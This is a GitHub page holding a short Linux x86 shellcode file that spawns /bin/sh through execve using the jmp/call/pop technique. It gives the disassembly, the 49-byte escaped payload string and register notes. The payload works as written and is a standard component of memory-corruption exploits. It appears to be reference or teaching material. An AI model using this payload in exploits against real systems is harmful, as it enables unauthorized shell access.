Shellcode/x86_shell at master · xophidia/Shellcode · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
----------------------------------------
Open a shell /bin/sh with jump/call/pop
----------------------------------------

By Xophidia - 2016
Platform: Linux / x86

jmp    0x804807c
pop    esi
xor    ebx,ebx
mov    BYTE PTR [esi+0x7],bl
mov    DWORD PTR [esi+0x9],esi
mov    DWORD PTR [esi+0xc],ebx
lea    ebx,[esi]
lea    ecx,[esi+0x9]
lea    edx,[esi+0xc]
xor    eax,eax
mov    al,0xb
int    0x80
call   0x8048062
das
bound  ebp,QWORD PTR [ecx+0x6e]
das
jae    0x80480f0
inc    ecx
inc    edx
inc    edx
inc    edx
inc    edx
inc    ebx
inc    ebx
inc    ebx
inc    ebx


Length: 49
"\xeb\x1a\x5e\x31\xdb\x88\x5e\x07\x89\x76\x09\x89\x5e\x0c\x8d\x1e\x8d\x4e\x09\x8d\x56\x0c\x31"
"\xc0\xb0\x0b\xcd\x80\xe8\xe1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43"

eax = 0xb = 11 = execve
ebx = /bin/sh
ecx = arg[] = 0
edx = envp[] = 0